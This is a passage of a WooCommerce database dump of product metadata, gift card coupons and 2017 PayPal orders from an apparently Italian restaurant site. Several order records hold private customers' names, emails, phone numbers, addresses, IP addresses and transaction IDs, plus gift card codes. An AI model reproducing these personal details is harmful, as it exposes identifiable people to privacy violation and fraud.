'),(6379,485,'_length',''),(6380,485,'_width',''),(6381,485,'_height',''),(6382,485,'_upsell_ids','a:0:{}'),(6383,485,'_crosssell_ids','a:0:{}'),(6384,485,'_purchase_note',''),(6385,485,'_default_attributes','a:0:{}'),(6386,485,'_virtual','yes'),(6387,485,'_downloadable','no'),(6388,485,'_product_image_gallery',''),(6389,485,'_download_limit','-1'),(6390,485,'_download_expiry','-1'),(6391,485,'_thumbnail_id','470'),(6392,485,'_stock',NULL),(6393,485,'_stock_status','outofstock'),(6394,485,'_wc_average_rating','0'),(6395,485,'_wc_rating_count','a:0:{}'),(6396,485,'_wc_review_count','0'),(6397,485,'_downloadable_files','a:0:{}'),(6398,485,'_product_attributes','a:0:{}'),(6399,485,'_product_version','3.2.5'),(6400,485,'_price','115'),(6401,485,'_yoast_wpseo_primary_product_cat','26'),(6402,485,'_yoast_wpseo_content_score','30'),(6403,485,'_edit_lock','1500188273:1'),(6404,485,'_edit_last','1'),(6405,36,'_thumbnail_id','470'),(6406,36,'_yoast_wpseo_content_score','90'),(6407,487,'_order_key','wc_order_5979f766154f3'),(6408,487,'_customer_user','0'),(6409,487,'_payment_method','paypal'),(6410,487,'_payment_method_title','PayPal'),(6411,487,'_transaction_id','0YJ7993597724433L'),(6412,487,'_customer_ip_address','79.2.39.72'),(6413,487,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; wow64; rv:54.0) gecko/20100101 firefox/54.0'),(6414,487,'_created_via','checkout'),(6415,487,'_date_completed','1501165535'),(6416,487,'_completed_date','2017-07-27 16:25:35'),(6417,487,'_date_paid','1501165524'),(6418,487,'_paid_date','2017-07-27 16:25:24'),(6419,487,'_cart_hash','97ac1da8ba9186d37e9dc4877873d749'),(6420,487,'_billing_first_name','letizia'),(6421,487,'_billing_last_name','vescovini'),(6422,487,'_billing_company',''),(6423,487,'_billing_address_1','via camatta 1'),(6424,487,'_billing_address_2',''),(6425,487,'_billing_city','41121 modena'),(6426,487,'_billing_state',''),(6427,487,'_billing_postcode',''),(6428,487,'_billing_country',''),(6429,487,'_billing_email','vescovini@studiovescovini.it'),(6430,487,'_billing_phone','328.2848608'),(6431,487,'_shipping_first_name',''),(6432,487,'_shipping_last_name',''),(6433,487,'_shipping_company',''),(6434,487,'_shipping_address_1',''),(6435,487,'_shipping_address_2',''),(6436,487,'_shipping_city',''),(6437,487,'_shipping_state',''),(6438,487,'_shipping_postcode',''),(6439,487,'_shipping_country',''),(6440,487,'_order_currency','EUR'),(6441,487,'_cart_discount','0'),(6442,487,'_cart_discount_tax','0'),(6443,487,'_order_shipping','0'),(6444,487,'_order_shipping_tax','0'),(6445,487,'_order_tax','0'),(6446,487,'_order_total','98.00'),(6447,487,'_order_version','3.1.1'),(6448,487,'_prices_include_tax','no'),(6449,487,'_billing_address_index','letizia vescovini  via camatta 1  41121 modena    vescovini@studiovescovini.it 328.2848608'),(6450,487,'_shipping_address_index','        '),(6451,487,'_shipping_method',''),(6452,487,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(6453,487,'Numero bambini fino a 6 anni',''),(6454,487,'Numero ragazzi fino a 13 anni',''),(6455,487,'Files attached','[]'),(6456,487,'Payer PayPal address','vescovini@studiovescovini.it'),(6457,487,'Payer first name','letizia'),(6458,487,'Payer last name','vescovini'),(6459,487,'Payment type','instant'),(6460,487,'_paypal_status','completed'),(6461,487,'_download_permissions_granted','yes'),(6462,487,'_recorded_sales','yes'),(6463,487,'_recorded_coupon_usage_counts','yes'),(6464,488,'discount_type','fixed_cart'),(6465,488,'coupon_amount','98'),(6466,488,'individual_use','no'),(6467,488,'usage_limit','1'),(6468,488,'expiry_date','2018-07-27'),(6469,488,'apply_before_tax','no'),(6470,488,'free_shipping','no'),(6471,488,'minimum_amount',''),(6472,488,'maximum_amount',''),(6473,488,'exclude_sale_items','no'),(6474,488,'exclude_product_ids',''),(6475,488,'exclude_product_categories',''),(6476,488,'mwb_wgm_giftcard_coupon','487'),(6477,488,'mwb_wgm_giftcard_coupon_unique','online'),(6478,488,'mwb_wgm_giftcard_coupon_product_id','435'),(6479,488,'mwb_wgm_giftcard_coupon_mail_to','Paola Dieci'),(6480,487,'487#103','solymarcouponPJSFP'),(6481,487,'mwb_wgm_order_giftcard','send'),(6482,487,'_order_stock_reduced','yes'),(6483,487,'PayPal Transaction Fee','3.68'),(6484,489,'_order_key','wc_order_597ef3147b334'),(6485,489,'_customer_user','0'),(6486,489,'_payment_method','paypal'),(6487,489,'_payment_method_title','PayPal'),(6488,489,'_transaction_id',''),(6489,489,'_customer_ip_address','93.146.241.225'),(6490,489,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/59.0.3071.115 safari/537.36'),(6491,489,'_created_via','checkout'),(6492,489,'_date_completed',''),(6493,489,'_completed_date',''),(6494,489,'_date_paid',''),(6495,489,'_paid_date',''),(6496,489,'_cart_hash','aed4db46bd50d3864f516d8bc816c19f'),(6497,489,'_billing_first_name','elisabetta'),(6498,489,'_billing_last_name','ricciato'),(6499,489,'_billing_company',''),(6500,489,'_billing_address_1','via isonzo 75'),(6501,489,'_billing_address_2',''),(6502,489,'_billing_city',''),(6503,489,'_billing_state',''),(6504,489,'_billing_postcode',''),(6505,489,'_billing_country',''),(6506,489,'_billing_email','ericciato@salcomservizi.it'),(6507,489,'_billing_phone','3351995452'),(6508,489,'_shipping_first_name',''),(6509,489,'_shipping_last_name',''),(6510,489,'_shipping_company',''),(6511,489,'_shipping_address_1',''),(6512,489,'_shipping_address_2',''),(6513,489,'_shipping_city',''),(6514,489,'_shipping_state',''),(6515,489,'_shipping_postcode',''),(6516,489,'_shipping_country',''),(6517,489,'_order_currency','EUR'),(6518,489,'_cart_discount','0'),(6519,489,'_cart_discount_tax','0'),(6520,489,'_order_shipping','0'),(6521,489,'_order_shipping_tax','0'),(6522,489,'_order_tax','0'),(6523,489,'_order_total','230.00'),(6524,489,'_order_version','3.1.1'),(6525,489,'_prices_include_tax','no'),(6526,489,'_billing_address_index','elisabetta ricciato  via isonzo 75      ericciato@salcomservizi.it 3351995452'),(6527,489,'_shipping_address_index','        '),(6528,489,'_shipping_method',''),(6529,489,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(6530,489,'Numero bambini fino a 6 anni',''),(6531,489,'Numero ragazzi fino a 13 anni',''),(6532,489,'Files attached','[]'),(6533,490,'_order_key','wc_order_597ef4f0614d9'),(6534,490,'_customer_user','0'),(6535,490,'_payment_method','paypal'),(6536,490,'_payment_method_title','PayPal'),(6537,490,'_transaction_id','76R84104PP738383C'),(6538,490,'_customer_ip_address','93.146.241.225'),(6539,490,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/51.0.2704.79 safari/537.36 edge/14.14393'),(6540,490,'_created_via','checkout'),(6541,490,'_date_completed',''),(6542,490,'_completed_date',''),(6543,490,'_date_paid','1501492617'),(6544,490,'_paid_date','2017-07-31 11:16:57'),(6545,490,'_cart_hash','3c35fcbd4260663df64b88785ce625de'),(6546,490,'_billing_first_name','elisabetta'),(6547,490,'_billing_last_name','ricciato'),(6548,490,'_billing_company',''),(6549,490,'_billing_address_1','via isonzo 75'),(6550,490,'_billing_address_2',''),(6551,490,'_billing_city','casalecchio di reno'),(6552,490,'_billing_state',''),(6553,490,'_billing_postcode',''),(6554,490,'_billing_country',''),(6555,490,'_billing_email','ericciato@salcomservizi.it'),(6556,490,'_billing_phone','3351995452'),(6557,490,'_shipping_first_name',''),(6558,490,'_shipping_last_name',''),(6559,490,'_shipping_company',''),(6560,490,'_shipping_address_1',''),(6561,490,'_shipping_address_2',''),(6562,490,'_shipping_city',''),(6563,490,'_shipping_state',''),(6564,490,'_shipping_postcode',''),(6565,490,'_shipping_country',''),(6566,490,'_order_currency','EUR'),(6567,490,'_cart_discount','0'),(6568,490,'_cart_discount_tax','0'),(6569,490,'_order_shipping','0'),(6570,490,'_order_shipping_tax','0'),(6571,490,'_order_tax','0'),(6572,490,'_order_total','115.00'),(6573,490,'_order_version','3.1.1'),(6574,490,'_prices_include_tax','no'),(6575,490,'_billing_address_index','elisabetta ricciato  via isonzo 75  casalecchio di reno    ericciato@salcomservizi.it 3351995452'),(6576,490,'_shipping_address_index','        '),(6577,490,'_shipping_method',''),(6578,490,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(6579,490,'Numero bambini fino a 6 anni',''),(6580,490,'Numero ragazzi fino a 13 anni',''),(6581,490,'Files attached','[]'),(6582,490,'Payer PayPal address','ericciato@salcomservizi.it'),(6583,490,'Payer first name','elisabetta'),(6584,490,'Payer last name','ricciato'),(6585,490,'Payment type','instant'),(6586,490,'_paypal_status','completed'),(6587,490,'_download_permissions_granted','yes'),(6588,490,'_recorded_sales','yes'),(6589,490,'_recorded_coupon_usage_counts','yes'),(6590,491,'discount_type','fixed_cart'),(6591,491,'coupon_amount','115'),(6592,491,'individual_use','no'),(6593,491,'usage_limit','1'),(6594,491,'expiry_date','2018-07-31'),(6595,491,'apply_before_tax','no'),(6596,491,'free_shipping','no'),(6597,491,'minimum_amount',''),(6598,491,'maximum_amount',''),(6599,491,'exclude_sale_items','no'),(6600,491,'exclude_product_ids',''),(6601,491,'exclude_product_categories',''),(6602,491,'mwb_wgm_giftcard_coupon','490'),(6603,491,'mwb_wgm_giftcard_coupon_unique','online'),(6604,491,'mwb_wgm_giftcard_coupon_product_id','475'),(6605,491,'mwb_wgm_giftcard_coupon_mail_to','Sara'),(6606,490,'490#106','solymarcouponIMWA4'),(6607,490,'mwb_wgm_order_giftcard','send'),(6608,490,'_order_stock_reduced','yes'),(6609,490,'PayPal Transaction Fee','4.26'),(6610,492,'_order_key','wc_order_598e0937ba2de'),(6611,492,'_customer_user','0'),(6612,492,'_payment_method','paypal'),(6613,492,'_payment_method_title','PayPal'),(6614,492,'_transaction_id','05180289XV605782N'),(6615,492,'_customer_ip_address','37.117.178.41'),(6616,492,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_6_8) applewebkit/537.36 (khtml, like gecko) chrome/49.0.2623.112 safari/537.36'),(6617,492,'_created_via','checkout'),(6618,492,'_date_completed','1502481017'),(6619,492,'_completed_date','2017-08-11 21:50:17'),(6620,492,'_date_paid','1502480941'),(6621,492,'_paid_date','2017-08-11 21:49:01'),(6622,492,'_cart_hash','d458c7f35975eb577e3934eab0f64a58'),(6623,492,'_billing_first_name','jenny'),(6624,492,'_billing_last_name','guerrini'),(6625,492,'_billing_company',''),(6626,492,'_billing_address_1',''),(6627,492,'_billing_address_2',''),(6628,492,'_billing_city','Trento'),(6629,492,'_billing_state',''),(6630,492,'_billing_postcode',''),(6631,492,'_billing_country',''),(6632,492,'_billing_email','immaginando.jenny@gmail.com'),(6633,492,'_billing_phone','3479006731'),(6634,492,'_shipping_first_name',''),(6635,492,'_shipping_last_name',''),(6636,492,'_shipping_company',''),(6637,492,'_shipping_address_1',''),(6638,492,'_shipping_address_2',''),(6639,492,'_shipping_city',''),(6640,492,'_shipping_state',''),(6641,492,'_shipping_postcode',''),(6642,492,'_shipping_country',''),(6643,492,'_order_currency','EUR'),(6644,492,'_cart_discount','0'),(6645,492,'_cart_discount_tax','0'),(6646,492,'_order_shipping','0'),(6647,492,'_order_shipping_tax','0'),(6648,492,'_order_tax','0'),(6649,492,'_order_total','115.00'),(6650,492,'_order_version','3.1.1'),(6651,492,'_prices_include_tax','no'),(6652,492,'_billing_address_index','jenny guerrini    Trento    immaginando.jenny@gmail.com 3479006731'),(6653,492,'_shipping_address_index','        '),(6654,492,'_shipping_method',''),(6655,492,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(6656,492,'Numero bambini fino a 6 anni',''),(6657,492,'Numero ragazzi fino a 13 anni',''),(6658,492,'Files attached','[]'),(6659,492,'Payer PayPal address','immaginando.jenny@gmail.com'),(6660,492,'Payer first name','jenny'),(6661,492,'Payer last name','guerrini'),(6662,492,'Payment type','instant'),(6663,492,'_paypal_status','completed'),(6664,492,'_download_permissions_granted','yes'),(6665,492,'_recorded_sales','yes'),(6666,492,'_recorded_coupon_usage_counts','yes'),(6667,493,'discount_type','fixed_cart'),(6668,493,'coupon_amount','115'),(6669,493,'individual_use','no'),(6670,493,'usage_limit','1'),(6671,493,'expiry_date','2018-08-11'),(6672,493,'apply_before_tax','no'),(6673,493,'free_shipping','no'),(6674,493,'minimum_amount',''),(6675,493,'maximum_amount',''),(6676,493,'exclude_sale_items','no'),(6677,493,'exclude_product_ids',''),(6678,493,'exclude_product_categories',''),(6679,493,'mwb_wgm_giftcard_coupon','492'),(6680,493,'mwb_wgm_giftcard_coupon_unique','online'),(6681,493,'mwb_wgm_giftcard_coupon_product_id','475'),(6682,493,'mwb_wgm_giftcard_coupon_mail_to','Ivo'),(6683,492,'492#107','solymarcouponK4YIT'),(6684,492,'mwb_wgm_order_giftcard','send'),(6685,492,'_order_stock_reduced','yes'),(6686,492,'PayPal Transaction Fee','4.26'),(6687,494,'_order_key','wc_order_59a66b527334f'),(6688,494,'_customer_user','0'),(6689,494,'_payment_method','paypal'),(6690,494,'_payment_method_title','PayPal'),(6691,494,'_transaction_id','6ES27644203901501'),(6692,494,'_customer_ip_address','10.0.0.156'),(6693,494,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_12_6) applewebkit/537.36 (khtml, like gecko) chrome/60.0.3112.113 safari/537.36'),(6694,494,'_created_via','checkout'),(6695,494,'_date_completed','1504078915'),(6696,494,'_completed_date','2017-08-30 09:41:55'),(6697,494,'_date_paid','1504078775'),(6698,494,'_paid_date','2017-08-30 09:39:35'),(6699,494,'_cart_hash','d5aa902010074406b7f2b509454aedb4'),(6700,494,'_billing_first_name','Matteo'),(6701,494,'_billing_last_name','Nardi'),(6702,494,'_billing_company',''),(6703,494,'_billing_address_1',''),(6704,494,'_billing_address_2',''),(6705,494,'_billing_city',''),(6706,494,'_billing_state',''),(6707,494,'_billing_postcode',''),(6708,494,'_billing_country',''),(6709,494,'_billing_email','teo.matrix@gmail.com'),(6710,494,'_billing_phone','3927452073'),(6711,494,'_shipping_first_name',''),(6712,494,'_shipping_last_name',''),(6713,494,'_shipping_company',''),(6714,494,'_shipping_address_1',''),(6715,494,'_shipping_address_2',''),(6716,494,'_shipping_city',''),(6717,494,'_shipping_state',''),(6718,494,'_shipping_postcode',''),(6719,494,'_shipping_country',''),(6720,494,'_order_currency','EUR'),(6721,494,'_cart_discount','0'),(6722,494,'_cart_discount_tax','0'),(6723,494,'_order_shipping','0'),(6724,494,'_order_shipping_tax','0'),(6725,494,'_order_tax','0'),(6726,494,'_order_total','115.00'),(6727,494,'_order_version','3.1.1'),(6728,494,'_prices_include_tax','no'),(6729,494,'_billing_address_index','Matteo Nardi        teo.matrix@gmail.com 3927452073'),(6730,494,'_shipping_address_index','        '),(6731,494,'_shipping_method',''),(6732,494,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(6733,494,'Numero bambini fino a 6 anni',''),(6734,494,'Numero ragazzi fino a 13 anni',''),(6735,494,'Files attached','[]'),(6736,494,'Payer PayPal address','teo.matrix@gmail.com'),(6737,494,'Payer first name','Matteo'),(6738,494,'Payer last name','Nardi'),(6739,494,'Payment type','instant'),(6740,494,'_paypal_status','completed'),(6741,494,'_download_permissions_granted','yes'),(6742,494,'_recorded_sales','yes'),(6743,494,'_recorded_coupon_usage_counts','yes'),(6744,495,'discount_type','fixed_cart'),(6745,495,'coupon_amount','115'),(6746,495,'individual_use','no'),(6747,495,'usage_limit','1'),(6748,495,'expiry_date','2018-08-30'),(6749,495,'apply_before_tax','no'),(6750,495,'free_shipping','no'),(6751,495,'minimum_amount',''),(6752,495,'maximum_amount',''),(6753,495,'exclude_sale_items','no'),(6754,495,'exclude_product_ids',''),(6755,495,'exclude_product_categories',''),(6756,495,'mwb_wgm_giftcard_coupon','494'),(6757,495,'mwb_wgm_giftcard_coupon_unique','online'),(6758,495,'mwb_wgm_giftcard_coupon_product_id','475'),(6759,495,'mwb_wgm_giftcard_coupon_mail_to','NAN COOSEMANS'),(6760,494,'494#108','solymarcouponJV0HE'),(6761,494,'mwb_wgm_order_giftcard','send'),(6762,494,'_order_stock_reduced','yes'),(6763,494,'PayPal Transaction Fee','4.26'),(6764,496,'_order_key','wc_order_59ddcf4313a82'),(6765,496,'_customer_user','0'),(6766,496,'_payment_method','paypal'),(6767,496,'_payment_method_title','PayPal'),(6768,496,'_transaction_id','2S538280VX9241318'),(6769,496,'_customer_ip_address','95.227.133.121'),(6770,496,'_customer_user_agent','mozilla/5.0 (windows nt 6.1; trident/7.0; rv:11.0) like gecko'),(6771,496,'_created_via','checkout'),(6772,496,'_date_completed','1507708959'),(6773,496,'_completed_date','2017-10-11 10:02:39'),(6774,496,'_date_paid','1507708881'),(6775,496,'_paid_date','2017-10-11 10:01:21'),(6776,496,'_cart_hash','650bb99f1f27a67c3e89aa33e59d9b4c'),(6777,496,'_billing_first_name','Marta'),(6778,496,'_billing_last_name','D\'Antonio'),(6779,496,'_billing_company',''),(6780,496,'_billing_address_1',''),(6781,496,'_billing_address_2',''),(6782,496,'_billing_city',''),(6783,496,'_billing_state',''),(6784,496,'_billing_postcode',''),(6785,496,'_billing_country',''),(6786,496,'_billing_email','marta05091989@gmail.com'),(6787,496,'_billing_phone','3288050364'),(6788,496,'_shipping_first_name',''),(6789,496,'_shipping_last_name',''),(6790,496,'_shipping_company',''),(6791,496,'_shipping_address_1',''),(6792,496,'_shipping_address_2',''),(6793,496,'_shipping_city',''),(6794,496,'_shipping_state',''),(6795,496,'_shipping_postcode',''),(6796,496,'_shipping_country',''),(6797,496,'_order_currency','EUR'),(6798,496,'_cart_discount','0'),(6799,496,'_cart_discount_tax','0'),(6800,496,'_order_shipping','0'),(6801,496,'_order_shipping_tax','0'),(6802,496,'_order_tax','0'),(6803,496,'_order_total','120.00'),(6804,496,'_order_version','3.1.1'),(6805,496,'_prices_include_tax','no'),(6806,496,'_billing_address_index','Marta D\'Antonio        marta05091989@gmail.com 3288050364'),(6807,496,'_shipping_address_index','        '),(6808,496,'_shipping_method',''),(6809,496,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(6810,496,'Numero bambini fino a 6 anni',''),(6811,496,'Numero ragazzi fino a 13 anni',''),(6812,496,'Files attached','[]'),(6813,496,'Payer PayPal address','marta05091989@gmail.com'),(6814,496,'Payer first name','Natasha'),(6815,496,'Payer last name','Berzigotti'),(6816,496,'Payment type','instant'),(6817,496,'_paypal_status','completed'),(6818,496,'_download_permissions_granted','yes'),(6819,496,'_recorded_sales','yes'),(6820,496,'_recorded_coupon_usage_counts','yes'),(6821,497,'discount_type','fixed_cart'),(6822,497,'coupon_amount','120'),(6823,497,'individual_use','no'),(6824,497,'usage_limit','1'),(6825,497,'expiry_date','2018-10-11'),(6826,497,'apply_before_tax','no'),(6827,497,'free_shipping','no'),(6828,497,'minimum_amount',''),(6829,497,'maximum_amount',''),(6830,497,'exclude_sale_items','no'),(6831,497,'exclude_product_ids',''),(6832,497,'exclude_product_categories',''),(6833,497,'mwb_wgm_giftcard_coupon','496'),(6834,497,'mwb_wgm_giftcard_coupon_unique','online'),(6835,497,'mwb_wgm_giftcard_coupon_product_id','472'),(6836,497,'mwb_wgm_giftcard_coupon_mail_to','Dott.ssa Elisa D\'Antonio'),(6837,496,'496#109','solymarcouponTHCO0'),(6838,496,'mwb_wgm_order_giftcard','send'),(6839,496,'_order_stock_reduced','yes'),(6840,496,'PayPal Transaction Fee','4.43'),(6841,54,'_yoast_wpseo_content_score','90'),(6842,75,'_yoast_wpseo_content_score','30'),(6843,77,'_yoast_wpseo_content_score','30'),(6844,79,'_yoast_wpseo_content_score','30'),(6845,81,'_yoast_wpseo_content_score','30'),(6846,102,'_yoast_wpseo_content_score','30'),(6847,104,'_yoast_wpseo_content_score','30'),(6848,83,'_yoast_wpseo_content_score','30'),(6849,85,'_yoast_wpseo_content_score','90'),(6850,87,'_yoast_wpseo_content_score','30'),(6851,89,'_yoast_wpseo_content_score','30'),(6852,91,'_yoast_wpseo_content_score','30'),(6853,96,'_yoast_wpseo_content_score','30'),(6855,100,'_yoast_wpseo_content_score','30'),(6857,525,'_order_key','wc_order_5a1423800079e'),(6858,525,'_customer_user','0'),(6859,525,'_payment_method','paypal'),(6860,525,'_payment_method_title','PayPal'),(6861,525,'_transaction_id','3EN50013KM9894637'),(6862,525,'_customer_ip_address','93.64.109.50'),(6863,525,'_customer_user_agent','mozilla/5.0 (windows nt 6.3; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.94 safari/537.36'),(6864,525,'_created_via','checkout'),(6865,525,'_date_completed',''),(6866,525,'_completed_date',''),(6867,525,'_date_paid','1511269368'),(6868,525,'_paid_date','2017-11-21 14:02:48'),(6869,525,'_cart_hash','d69414e6c243284881271de9abf9337f'),(6870,525,'_billing_first_name','Angelo'),(6871,525,'_billing_last_name','Tinti'),(6872,525,'_billing_company',''),(6873,525,'_billing_address_1','Via Pio Panfili 7'),(6874,525,'_billing_address_2',''),(6875,525,'_billing_city','Bologna'),(6876,525,'_billing_state',''),(6877,525,'_billing_postcode',''),(6878,525,'_billing_country',''),(6879,525,'_billing_email','tintiangelo14@yahoo.it'),(6880,525,'_billing_phone','3294013935'),(6881,525,'_shipping_first_name',''),(6882,525,'_shipping_last_name',''),(6883,525,'_shipping_company',''),(6884,525,'_shipping_address_1',''),(6885,525,'_shipping_address_2',''),(6886,525,'_shipping_city',''),(6887,525,'_shipping_state',''),(6888,525,'_shipping_postcode',''),(6889,525,'_shipping_country',''),(6890,525,'_order_currency','EUR'),(6891,525,'_cart_discount','0'),(6892,525,'_cart_discount_tax','0'),(6893,525,'_order_shipping','0'),(6894,525,'_order_shipping_tax','0'),(6895,525,'_order_tax','0'),(6896,525,'_order_total','115.00'),(6897,525,'_order_version','3.1.1'),(6898,525,'_prices_include_tax','no'),(6899,525,'_billing_address_index','Angelo Tinti  Via Pio Panfili 7  Bologna    tintiangelo14@yahoo.it 3294013935'),(6900,525,'_shipping_address_index','        '),(6901,525,'_shipping_method',''),(6902,525,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(6903,525,'Numero bambini fino a 6 anni',''),(6904,525,'Numero ragazzi fino a 13 anni',''),(6905,525,'Files attached','[]'),(6906,525,'Payer PayPal address','tintiangelo14@yahoo.it'),(6907,525,'Payer first name','Angelo'),(6908,525,'Payer last name','Tinti'),(6909,525,'Payment type','instant'),(6910,525,'_paypal_status','completed'),(6911,525,'_download_permissions_granted','yes'),(6912,525,'_recorded_sales','yes'),(6913,525,'_recorded_coupon_usage_counts','yes'),(6914,526,'discount_type','fixed_cart'),(6915,526,'coupon_amount','115'),(6916,526,'individual_use','no'),(6917,526,'usage_limit','1'),(6918,526,'expiry_date','2018-11-21'),(6919,526,'apply_before_tax','no'),(6920,526,'free_shipping','no'),(6921,526,'minimum_amount',''),(6922,526,'maximum_amount',''),(6923,526,'exclude_sale_items','no'),(6924,526,'exclude_product_ids',''),(6925,526,'exclude_product_categories',''),(6926,526,'mwb_wgm_giftcard_coupon','525'),(6927,526,'mwb_wgm_giftcard_coupon_unique','online'),(6928,526,'mwb_wgm_giftcard_coupon_product_id','475'),(6929,526,'mwb_wgm_giftcard_coupon_mail_to','Giada Frighi'),(6930,525,'525#110','solymarcouponR0HEB'),(6931,525,'mwb_wgm_order_giftcard','send'),(6932,525,'_order_stock_reduced','yes'),(6933,525,'PayPal Transaction Fee','4.26'),(6934,211,'_tax_status','taxable'),(6935,211,'_tax_class',''),(6936,211,'_default_attributes','a:0:{}'),(6937,211,'_download_limit','-1'),(6938,211,'_download_expiry','-1'),(6939,527,'_order_key','wc_order_5a1ea9031f174'),(6940,527,'_customer_user','0'),(6941,527,'_payment_method','paypal'),(6942,527,'_payment_method_title','PayPal'),(6943,527,'_transaction_id',''),(6944,527,'_customer_ip_address','172.16.77.90'),(6945,527,'_customer_user_agent','mozilla/5.0 (windows nt 6.3; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/62.0.3202.94 safari/537.36'),(6946,527,'_created_via','checkout'),(6947,527,'_date_completed',''),(6948,527,'_completed_date',''),(6949,527,'_date_paid',''),(6950,527,'_paid_date',''),(6951,527,'_cart_hash','27634c60d1c79a74b9a15cdf2ce921d0'),(6952,527,'_billing_first_name','Valentina'),(6953,527,'_billing_last_name','Gambetta'),(6954,527,'_billing_company',''),(6955,527,'_billing_address_1',''),(6956,527,'_billing_address_2',''),(6957,527,'_billing_city',''),(6958,527,'_billing_state',''),(6959,527,'_billing_postcode',''),(6960,527,'_billing_country',''),(6961,527,'_billing_email','vgambetta@vetrog.it'),(6962,527,'_billing_phone','3457161084'),(6963,527,'_shipping_first_name',''),(6964,527,'_shipping_last_name',''),(6965,527,'_shipping_company',''),(6966,527,'_shipping_address_1',''),(6967,527,'_shipping_address_2',''),(6968,527,'_shipping_city',''),(6969,527,'_shipping_state',''),(6970,527,'_shipping_postcode',''),(6971,527,'_shipping_country',''),(6972,527,'_order_currency','EUR'),(6973,527,'_cart_discount','0'),(6974,527,'_cart_discount_tax','0'),(6975,527,'_order_shipping','0'),(6976,527,'_order_shipping_tax','0'),(6977,527,'_order_tax','0'),(6978,527,'_order_total','60.00'),(6979,527,'_order_version','3.1.1'),(6980,527,'_prices_include_tax','no'),(6981,527,'_billing_address_index','Valentina Gambetta        vgambetta@vetrog.it 3457161084'),(6982,527,'_shipping_address_index','        '),(6983,527,'_shipping_method',''),(6984,527,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(6985,527,'Numero bambini fino a 6 anni',''),(6986,527,'Numero ragazzi fino a 13 anni',''),(6987,527,'Files attached','[]'),(6988,529,'_edit_lock','1517072559:1'),(6989,529,'_edit_last','1'),(6992,531,'_wp_attached_file','2017/12/capodanno2018.png'),(6993,531,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:650;s:6:\"height\";i:809;s:4:\"file\";s:25:\"2017/12/capodanno2018.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"capodanno2018-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"capodanno2018-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"capodanno2018-600x747.png\";s:5:\"width\";i:600;s:6:\"height\";i:747;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"capodanno2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"capodanno2018-241x300.png\";s:5:\"width\";i:241;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"capodanno2018-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"capodanno2018-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"capodanno2018-600x747.png\";s:5:\"width\";i:600;s:6:\"height\";i:747;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2018-550x400.png\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2018-230x286.png\";s:5:\"width\";i:230;s:6:\"height\";i:286;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2018-350x436.png\";s:5:\"width\";i:350;s:6:\"height\";i:436;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:25:\"capodanno2018-480x597.png\";s:5:\"width\";i:480;s:6:\"height\";i:597;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6996,529,'_yoast_wpseo_content_score','30'),(6997,529,'_yoast_wpseo_primary_category','1'),(7000,216,'_tax_status','taxable'),(7001,216,'_tax_class',''),(7002,216,'_default_attributes','a:0:{}'),(7003,216,'_download_limit','-1'),(7004,216,'_download_expiry','-1'),(7005,213,'_tax_status','taxable'),(7006,213,'_tax_class',''),(7007,213,'_download_limit','-1'),(7008,213,'_download_expiry','-1'),(7009,220,'_tax_status','taxable'),(7010,220,'_tax_class',''),(7011,220,'_default_attributes','a:0:{}'),(7012,220,'_download_limit','-1'),(7013,220,'_download_expiry','-1'),(7014,244,'_tax_status','taxable'),(7015,244,'_tax_class',''),(7016,244,'_default_attributes','a: